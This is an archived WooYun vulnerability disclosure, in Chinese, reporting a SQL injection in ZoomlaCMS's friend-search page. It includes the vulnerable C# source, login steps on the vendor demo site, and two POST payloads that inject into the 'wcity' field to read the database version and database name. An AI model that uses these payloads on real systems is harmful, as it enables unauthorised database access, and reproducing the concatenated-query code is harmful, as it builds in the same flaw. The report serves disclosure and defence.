乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-09: 细节已通知厂商并且等待厂商处理中 2014-08-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-10-08: 细节向核心白帽子及相关领域专家公开 2014-10-18: 细节向普通白帽子公开 2014-10-28: 细节向实习白帽子公开 2014-11-04: 细节向公众公开
逐浪cms最新版sql注入
逐浪最新版 sql注入可以注册普通用户 访问
http://demo.zoomla.cn/User/Register.aspx
随便注册一个用户test1234 密码123456访问
http://demo.zoomla.cn/User/Login.aspx?ReturnUrl=
登录访问
http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx
源码如下
protected void Page_Load(object sender, EventArgs e){ if (!base.IsPostBack) { string str = base.Request.Form["sex"]; string str2 = base.Request.Form["age1"]; string str3 = base.Request.Form["age2"]; string str4 = base.Request.Form["wcounty"]; //没处理 string str5 = base.Request.Form["wcity"]; //没处理 string wherex = ""; if (!string.IsNullOrEmpty(str)) { if (str == "女生") { wherex = wherex + " and UserSex=0"; } else if (str == "男生") { wherex = wherex + " and UserSex=1"; } } if (!string.IsNullOrEmpty(str2)) { string str7 = DateTime.Now.AddYears(-Convert.ToInt32(str2)).ToShortDateString(); wherex = wherex + " and BirthDay<='" + str7 + "'"; } if (!string.IsNullOrEmpty(str3)) { string str8 = DateTime.Now.AddYears(-Convert.ToInt32(str3)).ToShortDateString(); wherex = wherex + " and BirthDay>='" + str8 + "'"; } if (!string.IsNullOrEmpty(str4)) { wherex = wherex + " and workProvince='" + str4 + "'"; //存在注入 if (!string.IsNullOrEmpty(str5)) { wherex = wherex + " and workCity='" + str5 + "'"; //存在注入 } } this.ViewState["wherex"] = wherex; if (!this.buser.CheckLogin()) { if (SiteConfig.UserConfig.EnableCheckCodeOfLogin) { this.PhValCode.Visible = true; } else { this.PhValCode.Visible = false; } this.dwindow.Style["display"] = ""; } else { DataTable dt = new DataTable(); dt = UserTableBLL.GetUsersInfo(wherex); this.Bind(dt); } }}
访问
http://demo.zoomla.cn/User\UserFriend\FriendSearch/Friend_quickSYResult.aspx
提交
sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT @@VERSION)>0 --
sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT db_name())>0 --
漏洞证明如上
对参数进行处理吧
危害等级:无影响厂商忽略
忽略时间:2014-11-04 19:42
暂无